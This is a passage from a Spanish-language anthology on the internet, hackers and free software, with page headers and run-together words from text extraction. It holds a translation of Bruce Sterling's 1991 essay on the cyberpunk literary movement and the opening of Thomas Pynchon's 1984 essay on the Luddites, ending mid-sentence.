Y como fondo omnipresente, elnegocio, pues la imagen idílica ydemocrática de 6.000 millones decomputadoras uniendo al género humanocolisiona contra los aproximadamente600 millones de consumidores realesque importan al comercio electrónico. Sien algunas décadas más Internet serásinónimo de una nueva economía, de

Page 524: Internet, hackers y software li   varios

inéditas formas de la acción política ode un nuevo tipo de hábitat que recién seencuentra en estado de prototipo, nadielo sabe aún con certeza. ¿Y si Internetdesapareciera en una década, superadapor complejas formas de interrelaciónhumana que la industria biotecnológicacomienza a prometer y publicitar peroque aún tiene que inventar? A la fechade vencimiento de la red no se la incluyeen los manuales del usuario.

Page 525: Internet, hackers y software li   varios

Cyberpunk en losnoventa

Este artículo intenta definir al«movimiento cyberpunk» . Saliópublicado en la revista Interzone (Nº 48,junio de 1991), famosa revista inglesade fantasy y ciencia ficción que se editamensualmente desde 1982.

En esta última nota quisiera hablarabiertamente del «cyberpunk» no decyberpunk como sinónimo dedelincuente informático, sino decyberpunk, el movimiento literario.

Page 526: Internet, hackers y software li   varios

Hace unos años, en el frío inviernode 1985 (en esa época solía haberinviernos fríos, antes de que se supieralo del ozono) apareció un artículo enInterzone Nº 14, con el título: «LaNueva Ciencia Ficción». Era el primermanifiesto del «movimiento cyberpunk».El artículo hacía un balance de lahistoria y los principios del génerociencia ficción; el término «cyberpunk»no se empleaba ni una vez. «La NuevaCiencia Ficción» se publicó conpseudónimo en una revista de cienciaficción británica que tenía muchas másambiciones que éxito de ventas. Hacepoco sacó una edición con tapas a color

Page 527: Internet, hackers y software li   varios

para regocijo de sus lectores. Un buenlugar para un manifiesto.

Comparemos este humilde eventocon un artículo reciente, «Confesionesde un ex-cyberpunk», de mi amigo ycolega Lewis Shiner. Este artículo esotro honesto intento de declarar muertoal cyberpunk de parte de Alguien-Que-Lo-Vivió. El artículo de Shiner aparecióel 7 de enero de 1991 en The New YorkTimes, página de opinión.

Es un buen lugar (el New YorkTimes) también, pensaría uno, peroilustrativo de la paradójica suerte quecorren los «movimientos». La avalanchaque se desata por un grito y una pala en

Page 528: Internet, hackers y software li   varios

algún lugar de la montaña, no puedecontenerse con la mano, aunque sedisponga de una audiencia de variosmillones.

El «cyberpunk» , antes de que loencasillaran y adquiriera su famasiniestra, era un esfuerzo generoso,abierto, en contacto con la calle,anárquico y con actitud de «házlo-tú-mismo» , ethos que compartía con lasbandas de garage de los ‘70 de lamúsica punk. La revista de propagandadel cyberpunk, impresa en una solapágina, Cheap Truth, se repartía gratis alos que la pedían. Cheap Truth nuncatuvo copyright; se alentaban activamente

Page 529: Internet, hackers y software li   varios

las fotocopias.Los colaboradores de Cheap Truth

siempre usaban pseudónimos, un intentoigualitario y honesto de evitar cualquierculto de personalidad o elitismo. CheapTruth se reía de los «gurús» del género einvitaba a todos los que estuvieranescuchando a que cargaran unprocesador de texto y se unieran a lacausa. Las ingenuas propuestas deCheap Truth para la ciencia ficción eranque ésta debía estar «viva» , ser«leíble» y estar «bien escrita» . Pero enla práctica no era tan fácil. Se oscurecíala visión por el polvo que levantaba labatalla.

Page 530: Internet, hackers y software li   varios

Cheap Truth logró un éxito ambiguo.Hubo una respuesta entusiasta hacia lobásico: la ciencia ficción tenía que«esforzarse más» y «terminar con loslugares comunes» si quería conseguirmás prestigio. Casi todos estaban deacuerdo en esto —pero no lo hacían. Enel género ciencia ficción siempre fuemás fácil obviar estos truísmos parahabitar en las trivialidades de laliteratura comercial: el empleo de ochohoras al día en la Antigua Fábrica. Otrosslogans «cyberpunk» muy de moda,como el «pensamiento imaginativo» y el«conocimiento técnico» también seperdieron en el camino. ¡Ay!, si fuera

Page 531: Internet, hackers y software li   varios

suficiente con rezar unas oraciones paracambiar un género, la tierra hubieratemblado cuando Aldiss y Knightexpresaron ideales muy parecidos en1956.

La lucha de la ciencia ficción porelevar su calidad venía de muy atrás,pero los escritores de Cheap Truth erandemasiado jóvenes y parroquianos paraestar al tanto. La cultura habíacambiado, y había grandes diferencias.En los ‘50 el «conocimiento técnico»podía ser inquietante, pero tambiénhonesto y motivador —en los ‘80, con latecnología en auge, «conocimientotécnico» remitía a «éxtasis y horror» ,

Page 532: Internet, hackers y software li   varios

directamente. Esta rareza del cyberpunkeclipsó la simplicidad de su Teoría yPráctica.

Los «escritores cyberpunk»empezaron a hacerse famosos, y la ideaoriginal del cyberpunk abierto ydisponible para todos, se perdió en lassombras. El cyberpunk fue un cultoinmediato, probablemente la definiciónmisma de culto en la ciencia ficciónmoderna. Hasta compañeros degeneración, que simpatizaban con muchade la retórica de Cheap Truth,terminaron desconfiando de este culto—los «cyberpunks» se habíanconvertido en «gurúes» del género.

Page 533: Internet, hackers y software li   varios

Es asombroso, realmente, lo fácilque es convertirse en gurú de un géneroliterario. Lo dudoso es que se logre algocon ese esfuerzo. En realidad, ¿quiénconfía en los gurús? ¡Cheap Truth nuncalo hizo! En fin, tomó unos tres añosdeshacer por completo el Movimiento.Cheap Truth dejó de editarse en 1986.

Quisiera pensar que sirvió para queotros no repitan los mismos errores. Enrealidad, lo dudo mucho.

Ruckler, Shiner, Sterling, Shirley yGibson —los más respetados «gurús»del Movimiento, desfilan en el valiosoartículo de Shiner ante a los cautivadosmillones del New York Times—,

Page 534: Internet, hackers y software li   varios

aunque lo nieguen, ellos son«cyberpunks» . Otros cyberpunks, comolos demás autores que participaron enMirrorshades: una AntologíaCiberpunk[99] quizás puedan arreglarcuentas con la bestia, más o menos. Peroesta indeseable palabra «cyber» segurova a quedar grabada en nuestras lápidas.Son inútiles las desmentidas en público,y puede que empeoren la situación. Nilos cambios más vertiginosos en nuestromodo de escribir, o las conversiones alIslam o a la Santería que hagamos enmedio de crisis existenciales, podránborrarnos el tatuaje de «escritorescyberpunks» .

Page 535: Internet, hackers y software li   varios

Así, la literatura «cyberpunk» no esmás que «lo que escriben loscyberpunks» . Y eso abarca mucho.Personalmente, yo siempre tuvedebilidad por las fantasías históricas;Shiner escribe novelas de misterio ythrillers. Shirley escribe terror. ARuckler se lo vio por última vez enalgún lugar dentro de la Tierra Hueca.De William Gibson se suposorpresivamente que escribe cuentosmuy divertidos. Pero eso no es nada. El«Cyberpunk» no «morirá» hasta que estéenterrado el último de nosotros. Segúnlos censos demográficos llevarábastante tiempo.

Page 536: Internet, hackers y software li   varios

Las ideas de apertura que proponíaCheap Truth fueron de dudosa utilidad—pese al respaldo de Interzone. Quizáslos «principios» eran demasiadogenerales y abstractos, demasiadoarcanos e inabordables, en comparacióna las marcas más fáciles de identificardel género, como los implantescerebrales, los jeans de cuero negros, laadicción a las anfetaminas. Pero quizásno sea tarde para ofrecer un ejemploconcreto y funcional de genuinaWeltanschaung [cosmovisión]cyberpunk.

Tomen Frankenstein de MaryShelley, una semilla del género ciencia

Page 537: Internet, hackers y software li   varios

ficción. Desde un enfoque cyberpunk,Frankenstein es ciencia ficción«Humanista». Frankenstein promueve eldictum romántico de que hay AlgunasCosas Que El Hombre No Debía Saber.No hay meros mecanismos físicos paraesta ley moral superior —sufuncionamiento trasciende lacomprensión mortal, es algo relativo ala voluntad divina. Hubris debe hallar anémesis; esta es, sencillamente, lanaturaleza de nuestro universo. El Dr.Frankenstein comete una trasgresiónescalofriante, una afrenta al almahumana, y con memorable justiciapoética, es horriblemente castigado por

Page 538: Internet, hackers y software li   varios

su propia creación, el Monstruo.Ahora imaginen una versión

cyberpunk de Frankenstein. En esta obraimaginaria, el Monstruo sería elproyecto que lleva adelante el equipo deInvestigación y Desarrollo bienfinanciado de alguna corporaciónglobal. El Monstruo, lo mismo podríadirigir su furiosa destrucción sobrepersonas al azar. Pero habiendo hechoesto, no se le permitiría perderse en elPolo Norte, recitando pensamientosbyronianos. Los Monstruos delcyberpunk nunca se desvanecen tancómodamente. Ya están sueltos en lascalles. Están cerca de nosotros. Es

Page 539: Internet, hackers y software li   varios

probable que «NOSOTROS» seamosellos. El Monstruo acabaría registradobajo copyright por las nuevas leyesgenéticas, y siendo fabricado de a milesen todo el mundo. En poco tiempo todoslos Monstruos estarían con empleosnocturnos mal pagos lavando pisos enrestaurantes fast-food.

En el universo moral del cyberpunk,nosotros ya sabemos Cosas Que NoTeníamos Que Saber. Nuestros«abuelos» sabían estas cosas; RobertOppenheimer en Los Álamos seconvirtió en Destructor de Mundosmucho antes de que apareciéramos enescena. En el cyberpunk, la idea de que

Page 540: Internet, hackers y software li   varios

hay límites sagrados para la acciónhumana es simplemente una ilusión. Nohay fronteras sagradas que nos protejande nosotros mismos.

Nuestra situación en el universo esbásicamente accidental. Somos débiles ymortales; pero no es la voluntad de losdioses, es sólo la manera en que lascosas se dan por el momento. Y esto esradicalmente insatisfactorio; no porqueextrañemos terriblemente el resguardode la Deidad, sino porque mirado conobjetividad el valle del sufrimientohumano es básicamente una tristeza. Lacondición humana puede cambiar, y serácambiada, y está cambiando; la única

Page 541: Internet, hackers y software li   varios

pregunta real es cómo, y con qué fin.En el cyberpunk, esta convicción

«anti-humanista» no es simplemente unapirueta para enfurecer a la burguesía; esun hecho objetivo de la cultura a finesdel siglo veinte. El cyberpunk no inventóesta situación; sólo la refleja.

Hoy es bastante común ver acientíficos muy circunspectos adhiriendoa ideas horrorosamente radicales:nanotecnología, inteligencia artificial,suspensión criogénica de los muertos,descarga de los contenidos delcerebro… La manía hubrística estásuelta en los pasillos de la academia,donde todo el mundo y las hermanas de

Page 542: Internet, hackers y software li   varios

todo el mundo parecen tener un planpara ajustar el cosmos a sus oídos. Laindignación moral de Stern es muy débil;si llegara a haber una diabólica drogaque pudiera extender nuestras sagradasexpectativas de vida, por Diosotorgadas, en cien años, el Papa sería elprimero en la fila.

Vivimos ya, todos los días, pormedio de acciones atroces conconsecuencias impredecibles para elmundo entero. La población mundial seha duplicado desde 1970; el mundonatural, que solía envolver a lahumanidad con sus vastos silenciosgóticos, ahora es algo que debe

Page 543: Internet, hackers y software li   varios

catalogarse y protegerse.Sencillamente, ya no resultamos

eficaces al rechazar cosas que no lucenadecuadas. Como sociedad no podemosni siquiera darle la espalda a riesgosabismales como la heroína y la bombade hidrógeno. Como cultura, amamosjugar con fuego, sólo por el placer de subrillo; y si resulta que hay dinero de pormedio, no hay nada que puedacontenerlo. Los cuerpos que sedespiertan de Mary Shelley, son losúltimos de nuestros problemas; algo muycercano a eso ocurre en las guardias decuidados intensivos todos los días.

El pensamiento humano en sí mismo,

Page 544: Internet, hackers y software li   varios

bajo su apariencia sin precedentes desoftware de computadoras, se estáconvirtiendo en algo cristalizado,copiado, hecho mercancía. Incluso losinteriores de nuestro cerebro no sonsagrados; por el contrario, el cerebrohumano es un blanco primario deinvestigaciones cada vez más exitosas—preguntas ontológicas y espirituales,sean malditas. La idea de que, bajo estascircunstancias, la Naturaleza Humanaestá de alguna manera destinada aprevalecer contra la Gran Máquina, essimplemente tonta; resulta notoriamentesalida de foco. Es como si un roedorfilósofo en una jaula de laboratorio,

Page 545: Internet, hackers y software li   varios

próximo a tener el cerebro agujereado yenchufado en función de la GranCiencia, declarara piadosamente que alfinal la Naturaleza Roedor triunfará.

Cualquier cosa que se le puedahacer a una rata se le puede hacer a unser humano. Y podemos hacerle casitodo a las ratas. Este es un tema duropara pensar, pero es la verdad. No va acambiar porque nos tapemos los ojos.

«Esto» es cyberpunk. Lo cualexplica, espero, por qué las sagas deaventuras de ciencia ficción standard, decuero con tachas, y todo el cotillóncyber, no pasan la prueba. Lewis Shinerse cansó de escritores que ofrecen

Page 546: Internet, hackers y software li   varios

narcóticos tiroteos para inundar lasvitrinas con «tics» cyberpunk. «Algunosescritores convirtieron la forma enfórmula» , se queja en The New YorkTimes, «los mismos argumentos confinales predecibles que encontramos enlos video-juegos y las películas devideoclub» . Las primeras conviccionesde Shiner apenas se movieron un micrón—pero lo que la mayoría llama«cyberpunk» ya no satisface sus ideales.

En mi opinión estos recién-llegadosson un tema menor. Y también lo es eltérmino «cyberpunk» . Me complace verque cada vez es más difícil escribir unlibro estúpido, poner la palabra

Page 547: Internet, hackers y software li   varios

«cyberpunk» en él, y esperar a que sevenda. Con la palabra-C desacreditadapor la saturación de estupideces,cualquiera que se diga «cyberpunk»ahora tiene que aportar su propio peso.Pero para los que quieran hacerlo, ya noes negocio. Las etiquetas no puedendefender su propia integridad; pero losescritores pueden, y los buenos lo hacen.

Hay otro aspecto general que meparece que es importante para unacomprensión real del Movimiento. Elcyberpunk, como la New Wave antesque él, fue una voz de Bohemia. Vinodel underground, de los márgenes, de lojoven y energético y para-institucional.

Page 548: Internet, hackers y software li   varios

Vino de gente que no conocía suspropios límites, y rechazaba los límitesofrecidos por las costumbres y loshábitos.

No mucha ciencia ficción esrealmente Bohemia, y la mayoría de laBohemia tiene poco que ver con laciencia ficción, pero hubo, y hay, muchoque ganar del encuentro entre ambas. Laciencia ficción como género, incluso lamás «convencional», tiene bastante deunderground cultural. La ciencia ficcióninfluye en la gran sociedad exterior; ycomo la difusa influencia de losbeatniks, hippies y punks, estácuidadosamente limitada. La ciencia

Page 549: Internet, hackers y software li   varios

ficción, como la Bohemia, es un lugarútil para poner a un amplio espectro depersonas, donde sus ideas y accionespueden probarse, sin riesgo de poneresas ideas y acciones directamente enpráctica generalizada. La Bohemia hacumplido esta función desde suscomienzos en la temprana RevoluciónIndustrial, y la sabiduría de esteesquema debería admitirse. La mayoríade las ideas extrañas son simplementeideas extrañas, y la Bohemia en el poderraramente ha sido una visión agradable.Julio Verne como escritor de novelas deaventuras es una cosa; Presidente Verne,General Verne, o Papa Verne es una

Page 550: Internet, hackers y software li   varios

idea más inquietante.El cyberpunk fue una voz de

Bohemia —Bohemia en los ‘80. Loscambios tecno-sociales desatados ennuestra sociedad contemporánea nopodían dejar de afectar su contracultura.El cyberpunk fue la encarnación literariade este fenómeno. Y el fenómenotodavía está creciendo. Las tecnologíasde la comunicación en particular, seestán volviendo mucho menosrespetables, mucho más volátiles y cadavez más en manos de personas que no lepresentarías a tu abuela.

Pero hoy debe admitirse que loscyberpunks —veteranos de la ciencia

Page 551: Internet, hackers y software li   varios

ficción, en o cerca de los cuarenta, querefinan pacientemente su arte y cobransus cheques de regalías— no son másuna Bohemia underground. Esto tambiénes una vieja historia en la Bohemia; esel castigo standard por el éxito. Ununderground a la luz del día es unacontradicción de términos. Estarespetabilidad no es sólo de algunoscasos aislados, los abarcacolectivamente. Y en este sentido, el«cyberpunk» está todavía más muerto delo que Shiner admite.

El tiempo y las oportunidades hansido generosos con los cyberpunks, peroellos mismos han cambiado con los

Page 552: Internet, hackers y software li   varios

años. Una doctrina central en la teoríadel Movimiento era la «intensidadvisionaria» . Pero ha transcurrido unlargo tiempo desde que algún cyberpunkescribiera un cuento que realmentevolara-la-cabeza, algo que retorciera,agitara, que aullara, alucinara y movierala estantería. En los últimos trabajos deestos veteranos, vemos tramas másajustadas, mejores personajes, prosamás fina, «futurismo serio eintrospectivo» . Pero también vemosmenos cosas en el estilo de vuelosespontáneos y danzas alocadas sobre lasmesas. Los escenarios se acercan más ymás al tiempo presente, perdiendo los

Page 553: Internet, hackers y software li   varios

rizados barrocos de la fantasía suelta:los temas en cuestión se convierten enalgo horriblemente parecido apreocupaciones de adultos responsablesde mediana edad. Y esto puede serespléndido, pero no es la guerra. A esteaspecto vital de la ciencia ficción se haabdicado, y está disponible para serretomado. El cyberpunk simplementedejó de estar ahí.

Pero la ciencia ficción todavía estáviva, todavía abierta y en desarrollo. YBohemia no va a irse. La Bohemia,como la ciencia ficción, no es una moda,pese a que genera modas; como laciencia ficción, la Bohemia es vieja; tan

Page 554: Internet, hackers y software li   varios

vieja como la sociedad industrial, de lacual la ciencia ficción y Bohemia son,ambas, partes integrantes. La BohemiaCibernética no es una aparición bizarra;cuando los bohemios cibernéticosproclaman que lo que están haciendo escompletamente nuevo, se engañan a símismos inocentemente, sólo por serjóvenes.

Los cyberpunks escriben sobre eléxtasis y los peligros de navegar en elciberespacio y Verne escribió sobre eléxtasis y los peligros de Cinco semanasen globo, pero si te mueves medio pasofuera del barro de las circunstanciashistóricas puedes ver que ambos sirven

Page 555: Internet, hackers y software li   varios

a la misma básica función social.Obviamente Verne, un gran maestro,

todavía se edita, mientras que elveredicto está pendiente respecto delcyberpunk. Y, por supuesto, Verne seequivocó en todo acerca del futuro,salvo por algunos aciertos con suerte;pero lo mismo hará el cyberpunk. JulioVerne terminó como una especie de ricoexcéntrico y amada celebridad en elgobierno de la ciudad de Amiens.Peores cosas han ocurrido, supongo.

A medida que los representantes delcyberpunk consiguen una legitimidadinvoluntaria, se hace más difícilpretender que el cyberpunk tiene algo de

Page 556: Internet, hackers y software li   varios

raro y aberrante; hoy es más fácil ver dedónde vino, y cómo llegó hasta acá. Y sepodría pensar que la reverencia a JulioVerne es algo bizarro para uncyberpunk. Podría, por ejemplo, decirseque Julio Verne era un buen tipo queamaba a su mamá, mientras que losbrutales y antihumanistas cyberpunkspromueven drogas, anarquía, conexionescerebrales y destrucción de todo losagrado.

Esta objeción es engañosa. ElCapitán Nemo era un tecno-anarcoterrorista. Julio Verne repartíapanfletos radicales en 1848 cuando lascalles de Paris estaban cubiertas de

Page 557: Internet, hackers y software li   varios

muertos. Pero Julio Verne igual esconsiderado un optimista victoriano(aquellos que lo han leído deben dudarde esto), mientras que los cyberpunkssuelen ser considerados como nihilistas(por aquellos que eligen y arman elcánon). ¿Por qué? Es el tenor de lostiempos, pienso yo.

Hay mucha desolación en elcyberpunk, pero es una desolaciónhonesta. Hay éxtasis, pero también hayhorror. Mientras estoy sentado aquí, unoído puesto en las noticias de la TV,oigo al Senado de EE.UU debatir sobrela guerra. Y detrás de esas palabras hayciudades incendiadas y multitudes

Page 558: Internet, hackers y software li   varios

laceradas por granadas aéreas, soldadoscon convulsiones provocadas por el gasmostaza y sarín.

Esta generación tendrá que observarun siglo de maníaca devastación ydescuido, y lo sabemos. Seremosafortunados de no sufrir demasiado pormaltratos ecológicos ya cometidos;seremos extremadamente afortunados sino vemos a millones de seres humanoshermanos morir horriblemente entelevisión mientras nosotrosoccidentales nos sentamos en nuestroslivings comiendo nuestrashamburguesas. Y esto no es un tontodiscurso bohemio; esto es una

Page 559: Internet, hackers y software li   varios

afirmación objetiva sobre la condicióndel mundo, fácil de confirmar paracualquiera con el coraje de mirar loshechos.

Estas perspectivas deben y deberíanafectar nuestros pensamientos yexpresiones y, sí, nuestras acciones; y silos escritores cierran sus ojos a esto,pueden crear entretenimiento, pero nocumplen con los requisitos para serllamados escritores de ciencia ficción.Y los cyberpunks son escritores deciencia ficción —no de un «sub-género»o de un «culto» , sino de la cosa misma.Merecemos ese título y no se nosdebería privar de él.

Page 560: Internet, hackers y software li   varios

Pero los Noventas no van apertenecer a los cyberpunks. Vamos aestar ahí trabajando, pero no somos elMovimiento, ni siquiera somos«nosotros» ya. Los Noventas van apertenecer a la generación que viene,aquellos que crecieron en los Ochentas.Todo el poder, y la mejor suerte para elunderground de los Noventas. No teconozco, pero sé que estás ahí. Haz quesuceda, puede hacerse. Lo sé. Yo estuveahí.

Page 561: Internet, hackers y software li   varios

¿Esta bien ser unLuddita?

T Thomas Pynchon es un escritornorteamericano. Nació en Long Island,Nueva York, en 1937. Estudió física dosaños en la Universidad de Cornell, peroabandonó para estudiar Literatura. Entre1960 y 1962 trabajó escribiendodocumentos técnicos para el programade misiles nucleares del gobierno. En1963 publicó V. su primera novela, porla que recibió el premio de laFundación William Faulkner . Desdeentonces su fama ha ido creciendo hastaser considerado uno de los más grandesnovelistas vivos de su país. Logró evitar

Page 562: Internet, hackers y software li   varios

a la prensa durante todos estos años, porlo que sólo se lo conoce a través de unaspocas fotografías. En 1997 un periodistade la CNN logró tomarle una foto en lacalle, pero Pynchon negoció dar unaentrevista a cambio de que su imagen nose difundiera. También escribió, entreotros libros, El arco iris de gravedad(1973), Vineland (1990) y Mason yDixon (1997).

Este artículo salió publicado en eldiario The New York Times el 28 deoctubre de 1984.

Como si el hecho de que sea 1984no bastara, también es el 25.ºaniversario este año de la famosaConferencia de Rede de C.P Snow, LasDos Culturas y la Revolución

Page 563: Internet, hackers y software li   varios

Científica, notable por su advertenciade que la vida intelectual en Occidentese estaba polarizando cada vez másentre las facciones literaria y científica,cada una condenada a no entender ovalorar a la otra. La conferenciaoriginalmente se proponía tratar temascomo la reforma de los programas deinvestigación en la era del Sputnik y elrol de la tecnología en el desarrollo delo que pronto se haría conocido comotercer mundo. Pero fue la teoría de lasdos culturas la que llamó la atención dela gente. De hecho armó un buen revueloen su momento. Algunos temas de por síya resumidos, se simplificaron aún más,

Page 564: Internet, hackers y software li   varios

lo cual produjo ciertas opiniones, tonosque se elevaron, incluso respuestasdestempladas, llegando todo el asunto aadquirir, aunque atenuado por lasnieblas del tiempo, un marcado aire dehisteria.

Hoy nadie podría salir impune deuna distinción como esa. Desde 1959,llegamos a vivir inmersos en flujos dedatos más vastos que cualquier otra cosaque el mundo haya visto. Ladesmitificación es la orden de nuestrodía, todos los gatos están saltando detodos los bolsos e incluso empiezan amezclarse. Inmediatamente sospechamosinseguridad en el ego de personas que

Page 565: Internet, hackers y software li   varios

todavía pueden tratar de escondersedetrás de la jerga de una especialidad ode aspirar a una base de datos quesiempre esté más allá del alcance de unprofano. Cualquiera que en estos díastenga lo necesario (tiempo, primariocompleto y una suscripción paga), puedereunirse con casi cualquier porción deconocimiento especializado que él o ellanecesite. Así que, llegados a este punto,la disputa ente las dos culturas no sepuede sostener más. Como se verá enuna visita a cualquier biblioteca opuesto de revistas de la zona, ahora haytantas más de dos culturas, que elproblema se ha vuelto, en realidad,

Page 566: Internet, hackers y software li   varios

cómo hallar tiempo para leer cualquiercosa fuera de la especialidad de uno.

Lo que persiste, después de un largocuarto de siglo, es el factor humano. Consu pericia de novelista, al fin y al cabo,C.P Snow buscó identificar no sólo dostipos de educación sino también dostipos de personalidad. Ecosfragmentarios de viejas discusiones, deofensas no olvidadas recibidas a lolargo de charlas académicas que seremontan en el tiempo, pueden haberayudado a conformar el subtexto de lainmoderada, y por eso festejada,afirmación de Snow, Dejando delado la cultura científica, el resto de

Page 567: Internet, hackers y software li   varios

los intelectuales nunca intentaron,quisieron, ni lograron entender a laRevolución Industrial. Estosintelectuales, en su mayoría literarios,eran, para Lord Snow, ludditasnaturales.

Salvo, quizás, el Pitufo Filósofo, esdifícil imaginarse a alguien en estos díasque quiera que lo llamen intelectualliterario, aunque no suena tan mal si seamplía el término a, digamos, gente quelee y piensa. Que lo llamen luddita esotro tema. Trae consigo preguntas, comoser, ¿Hay algo en la lectura y elpensamiento que llevaría opredispondría a una persona a

Page 568: Internet, hackers y software li   varios

convertirse en luddita? ¿Está bien ser unluddita? Y llegados a este punto, enrealidad, ¿qué es un luddita?.

Históricamente, los ludditasflorecieron en Inglaterra desdealrededor de 1811 a 1816. Eran bandasde hombres, organizados, enmascarados,anónimos, cuyo propósito era destruirmaquinaria usada sobre todo en laindustria textil. Juraban lealtad no a unRey británico, sino a su propio ReyLudd. No está claro si se llamaban a símismos ludditas, aunque así losllamaban tanto sus amigos como susenemigos. El uso de la palabra por C.P

Page 569: Internet, hackers y software li   varios

Snow obviamente buscaba polemizar,queriendo dar a entender un miedo yodio irracionales a la ciencia y latecnología. Los ludditas habían llegado,de esta manera, a ser imaginados comolos contrarevolucionarios de esaRevolución Industrial que sus sucesorescontemporáneos nunca intentaron,quisieron, ni lograron entender.

Pero la Revolución Industrial no fue,como las Revoluciones Americana yFrancesa de más o menos el mismoperíodo, una lucha violenta con unprincipio, mitad de camino y final. Fuemás suave, menos terminante, másparecida a un período acelerado en una

Page 570: Internet, hackers y software li   varios

larga evolución. El nombre fuepopularizado hace cien años por elhistoriador Arnold Toynbee, y ha tenidosu parte de atención revisionistaúltimamente, en la edición de julio de1984, de Scientific American. En ella,en «Medieval Roots of the IndustrialRevolution» , Terry S. Reynolds sugiereque el papel inicial del motor a vapor(1765) puede haberse exagerado. Lejosde ser revolucionaria, mucha de lamaquinaria que el vapor había llegadopara poner en movimiento, había estadolista desde mucho antes, siendoimpulsada de hecho con agua y molinosdesde la Edad Media. No obstante, la

Page 571: Internet, hackers y software li   varios

idea de una revolución tecno-social, enla que salió triunfadora la misma genteque en Francia y América, demostró serútil para muchos a lo largo de los años,y no menos útil para los que, como C.PSnow, han creído descubrir con ludditasun modo de designar a aquellos con losque desacuerdan, políticamentereaccionarios y anticapitalistas al mismotiempo.

Pero el Oxford English Dictionarytiene una interesante historia que contar.En 1779, en un pueblito de algún lugarde Leicestershire, un Ned Ludd se metióen una casa y en un demente ataque defuria destruyó dos máquinas usadas para

Page 572: Internet, hackers y software li   varios

tejer medias de lana. La noticia secorrió. Pronto, cada vez que se hallabasaboteado un marco para medias —estovenía pasando, dice la EnciclopediaBritánica, desde 1710 aproximadamente— la gente respondía con la frase (yapopular), Por acá debe haber pasadoLudd. Para cuando su nombre fueadoptado por los saboteadores detelares de 1812, el Ned Ludd históricose había asimilado en el de algunamanera sarcástico apodo de Rey (oCapitán) Ludd, y era ahora todomisterio, rumores y diversiónclandestina, rondando los distritos detejedores de Inglaterra, armado nada

Page 573: Internet, hackers y software li   varios

más que con un gracioso palo —cadavez que se topa con el marco de un telarse pone loco y no para hasta romperlo.

Pero importa mucho recordar queincluso el blanco del ataque original de1779, al igual que muchas de lasmáquinas de la Revolución Industrial, noera novedoso como pieza de tecnología.El telar para medias había estado dandovueltas desde 1589, cuando, según elfolklore, fue inventado por el reverendoWilliam Lee, llevado a ello por lalocura. Parece que Lee estabaenamorado de una joven que estaba másinteresada en su tejido que en él. Él ibaa su casa, y «Lo siento, Rev, tengo que

Page 574: Internet, hackers y software li   varios

tejer» «¡¿Qué?! ¿De nuevo?» . Despuésde un tiempo, incapaz de tolerar unrechazo así, Lee, a diferencia de NedLudd, sin ningún ataque de furiaalocada, sino lógica y serenamente —imaginemos—, se dedicó a inventar unamáquina que dejara obsoleto el tejidomanual de medias. Y lo logró. Deacuerdo a la enciclopedia, el telar delclérigo enamorado, era tan perfectoen su concepción que siguió siendo elúnico medio mecánico para tejer, porcientos de años.

Ahora, dada esa brecha de tiempo,no es nada fácil pensar a Ned Luddcomo un loco tecno-fóbico. No hay

Page 575: Internet, hackers y software li   varios

duda: lo que lo hacía admirable ylegendario era el vigor y la decisión conque aparecía. Pero las palabras dementeataque de furia son de segunda o terceramano, por lo menos 68 años después delos hechos. Y el enojo de Ned Ludd nose dirigía a las máquinas, noexactamente. Me gusta más pensarlocomo el enojo controlado, tipo artesmarciales, del Molesto decidido a todo.

Cuenta con una larga historiafolklórica esta figura, el Molesto. Sueleser hombre, y pese a ganarse a veces laintrigante tolerancia de las mujeres, loadmiran de manera casi universal loshombres debido a dos virtudes básicas:

Page 576: Internet, hackers y software li   varios

es Malo y Grande. Malo pero nomoralmente maligno, no necesariamente,más bien capaz de hacer daño a granescala. Lo que importa acá es laamplificación de la escala, el efectomultiplicador.

Las máquinas de tejer queprovocaron los primeros disturbiosludditas habían estado dejando sintrabajo a la gente por más de dos siglos.Todos veían cómo pasaba esto— sevolvió parte de la vida diaria. Tambiénveían a las máquinas convertirse más ymás en propiedad de personas que notrabajaban, sólo poseían y empleaban.No se necesitó a ningún filósofo alemán,

Page 577: Internet, hackers y software li   varios

en ese momento o después, para señalarlo que ésto hacía, había estado haciendo,a los salarios y a los trabajos. Elsentimiento general sobre las máquinasnunca hubiera podido ser mero horrorirracional, sino algo más complejo: elamor/odio que se genera entre humanosy maquinaria —especialmente cuando haestado dando vueltas por un tiempo—,sin mencionar un serio resentimientocontra por lo menos dos efectosmultiplicadores que fueron vistos comoinjustos y peligrosos. Uno era laconcentración de capital que cadamáquina representaba, y el otro, lacapacidad de cada máquina de dejar

Page 578: Internet, hackers y software li   varios

afuera del trabajo a un cierto número dehumanos —de ser más «valiosas» quemuchas almas humanas. Lo que le dio alRey Ludd ese especial Mal caráctersuyo, que lo llevó de héroe local aenemigo público nacional, fue que élembistió contra estos oponentesamplificados, multiplicados, más quehumanos, y prevaleció. Cuando lostiempos son duros, y nos sentimos amerced de fuerzas muchas veces máspoderosas, ¿acaso no nos volvemos enbusca de alguna compensación, aunquesea en la imaginación, en los deseos, ymiramos hacia el Molesto —el genio, elgolem, el gigante, el superhéroe— que

Page 579: Internet, hackers y software li   varios

resistirá lo que de otra manera nosabrumaría? Por supuesto, eldestrozamiento de telares reales oseculares, seguía a cargo de hombrescomunes, sindicalistas avanzados de laépoca, usando la noche, y su propiasolidaridad y disciplina, para lograr susefectos multiplicadores.

Era lucha de clases a la vista detodo el mundo. El movimiento tenía susaliados parlamentarios, entre ellos LordByron, cuyo discurso inaugural en elPalacio de los Lores en 1812compasivamente se opuso al proyecto deley que proponía, entre otras medidas derepresión, hacer pasible de pena de

Page 580: Internet, hackers y software li   varios

muerte el sabotaje de máquinas de tejerme d i a s . ¿No simpatizas con losludditas? le escribió desde Venecia aThomas Moore. ¡Por el Señor, que sihay una batalla estaré entre ustedes!¿Cómo les va a los tejedores —losdestrozadores de telares— losLuteranos de la política —losreformadores?. Incluía una amablecanción que mostró ser un himno ludditatan encendido que no fue publicadohasta después de muerto el poeta. Lacarta tiene fecha de diciembre de 1816:Byron había pasado el verano anterioren Suiza, atrapado por un tiempo en laVilla Diodati con los Shelley, mirando

Page 581: Internet, hackers y software li   varios

la lluvia caer, mientras se contaban entresí historias de fantasmas. Para esediciembre —así fue como sucedió—,Mary Shelley estaba trabajando en elCapítulo Cuatro de su novelaFrankenstein, o el Moderno Prometeo.

Si hubiera un género tal como lanovela luddita, ésta, que advierte de loque puede pasar cuando la tecnología, yaquellos que la manejan, se salen de loscarriles, sería la primera y estaría entrelas mejores. La criatura de VíctorFrankenstein, además, también calificacomo un enorme Molesto literario. Medecidí…, nos dice Víctor, a hacer a lacriatura de una estatura gigante, o sea,

Page 582: Internet, hackers y software li   varios

